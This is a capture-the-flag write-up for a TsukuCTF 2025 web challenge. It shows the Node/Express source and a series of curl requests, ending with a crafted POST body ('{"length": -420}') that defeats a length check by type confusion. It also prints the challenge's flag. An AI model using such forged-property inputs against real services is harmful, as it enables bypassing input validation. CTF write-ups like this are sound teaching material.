The challenge description suggests we run a curl command.
curl http://challs.tsukuctf.org:28888
How to use -> curl -X POST -d 'array=[1,2,3,4]' http://challs.tsukuctf.org:28888
Now we have a new curl command to try.
curl -X POST -d 'array=[1,2,3,4]' http://challs.tsukuctf.org:28888
error: no flag for you. sanitized string is [1,2,3,4], length is 9
Wait, do we just make the numbers add up to 6?
curl -X POST -d 'array=[1,2,3,0]' http://challs.tsukuctf.org:28888
error: no flag for you. sanitized string is [1,2,3,0], length is 9
I guess not. Let's check the source code 🔎
Source code
const express = require("express");
const bodyParser = require("body-parser");
const process = require("node:process");
const app = express();
const HOST = process.env.HOST ?? "localhost";
const PORT = process.env.PORT ?? "28888";
const FLAG = process.env.FLAG ?? "TsukuCTF25{dummy_flag}";
app.use(bodyParser.urlencoded({ extended: true }));
function chall(str = "[1, 2, 3]") {
const sanitized = str.replaceAll(" ", "");
if (sanitized.length < 10) {
return `error: no flag for you. sanitized string is ${sanitized}, length is ${sanitized.length.toString()}`;
}
const array = JSON.parse(sanitized);
if (array.length < 0) {
// hmm...??
return FLAG;
}
return `error: no flag for you. array length is too long -> ${array.length}`;
}
app.get("/", (_, res) => {
res.send(`How to use -> curl -X POST -d 'array=[1,2,3,4]' http://${HOST}:${PORT}\n`);
});
app.post("/", (req, res) => {
const array = req.body.array;
res.send(chall(array));
});
app.listen(PORT, () => {
console.log(`Server is running on http://${HOST}:${PORT}`);
});
Breaking it down
The spaces are removed from our array (string)
The resulting string length must be >= 10
The string is parsed into an array with JSON.parse
The resulting array length must be < 0
Crafting a JSON object
We can easily get around the first check by increasing the array (string) length, but we fail the second test.
curl -X POST -d 'array=[1,2,3,4,5]' http://challs.tsukuctf.org:28888
error: no flag for you. array length is too long -> 5
The trick here is to enter a string that is 10+ characters, but that when parsed as JSON will return a length less than 0. Since array is a JSON object and the code checks the length property of that object, why don't we try injecting a length property ourselves?
curl -X POST -d 'array={"length": -420}' http://challs.tsukuctf.org:28888
TsukuCTF25{l4n_l1n_lun_l4n_l0n}